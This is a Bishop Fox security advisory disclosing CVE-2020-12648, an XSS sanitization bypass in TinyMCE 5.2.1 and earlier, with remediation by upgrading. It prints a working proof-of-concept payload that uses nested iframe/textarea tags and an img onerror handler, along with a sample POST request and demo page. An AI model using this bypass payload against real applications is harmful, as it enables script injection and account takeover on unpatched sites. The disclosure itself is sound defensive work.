Bishop Fox named “Leader” in 2024 GigaOm Radar for Attack Surface Management. Read the Report ›

Gauge showing high severity reading for a security advisory for EzAdsPro “BlackBox” application.



The following document describes an identified vulnerability in the TinyMCE application in version 5.2.1. TinyMCE is in use on thousands of websites, but the risk and impact of this vulnerability on those sites depend on the details of the application in which TinyMCE is used. The use of "classic" editing mode, existing XSS protections, and whether users can control the initial content inside the editor all affect the exploitability of this vulnerability.

High Risk Level Impact

Applications that use the TinyMCE text editor and do not implement additional XSS protections such as a strict content security policy (CSP) may be vulnerable to XSS. The exploitability and impact of this vulnerability are specific to the deployed application, but could result in sensitive information disclosure, privilege escalation, and account takeover.

Affected Vendor

Product Vendor

Product Name

Affected Version

Tiny Technologies, Inc.

TinyMCE 5.2.1 and earlier

Product Description

TinyMCE is a What-You-See-Is-What-You-Get (WYSIWYG) HTML text editor and JavaScript library. It is typically included in third-party websites to provide text editing functionality, including HTML text. The project’s official website is The latest versions of the application are 4.9.11, released on July 13, 2020 and 5.4.1, released on July 8, 2020.

Vulnerabilities List:

One vulnerability was identified within the TinyMCE application:



Update to version 4.9.11 or 5.4.1



TinyMCE is affected by a vulnerability in its stripping and sanitization logic, which allows an attacker to bypass these built-in cross-site scripting (XSS) protections and execute arbitrary JavaScript code. The code was executed within the context of the application that loaded TinyMCE. This vulnerability can be mitigated with holistic XSS protections from the application, such as a strict content security policy (CSP), or by updating TinyMCE to version 4.9.11 or 5.4.1.


Security Risk


Access Vector

CVE-2020-12648 High Escalation of privileges, Information Disclosure, Other (context-dependent) Remote


An XSS vulnerability is present in TinyMCE version 5.2.1. When implemented in classic editing mode, the stripping and sanitization logic of TinyMCE can be bypassed using nested and non-terminated HTML tags, which can allow an attacker to inject aimg tag with arbitrary src and onerror values, resulting in XSS.

To demonstrate the vulnerability, an HTML page was created with an instance of the TinyMCE editor, based on the official TinyMCE Quick Start Guide, as shown below:

<!DOCTYPE html>
<html lang="en">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="" referrerpolicy="origin"></script>
      mode: "textareas"
 <h1>TinyMCE Quick Start Guide</h1>
  <form method="post">
    <textarea name="mytextarea" index="mytextarea">
          <mark><?php echo htmlspecialchars($_POST['mytextarea']) ?></mark>
    <input type="submit" value="submit">

This example used PHP to supply user-controlled content to TinyMCE for rendering on page load. The payload could also be supplied directly through the TinyMCE setContent and insertContent functions.

XSS was achieved using the following payload as user-supplied content: 

<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">

An example request is shown below: 

POST /tinymce.php HTTP/1.1
Host: localhost:8000
…omitted for brevity…

mytextarea=<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">

After the page loaded, the payload executed:

payload executed

This vulnerability was also discovered in TinyMCE version 4.0.26. The impact of this vulnerability depends on the details of the application in which TinyMCE is used.

Patch Details

The patched versions are 4.9.11 and 5.4.1



Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.

George Steketee

About the author, George Steketee

Senior Security Consultant

George Steketee is a Senior Security Consultant at Bishop Fox, where he focuses on application and network penetration testing. George has wide security experience including offensive security, defensive operations, full-time professional training, social engineering, software development, and DevOps. George has had responsibility in helping to ensure the security of billion-dollar organizations, government agencies, internationally known sports organizations, medical technology companies, and more.

More by George

Chris davis

About the author, Chris Davis

Senior Security Consultant

Chris Davis is a Senior Security Consultant at Bishop Fox. His areas of expertise are application penetration testing (static and dynamic) and external network penetration testing.

Chris actively conducts independent security research and has been credited with the discovery of 40 CVEs (including CVE-2019-7551 and CVE-2018-17150) on enterprise-level, highly distributed software. The vulnerabilities he identified included remote code execution and cross-site scripting (XSS).
More by Chris

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.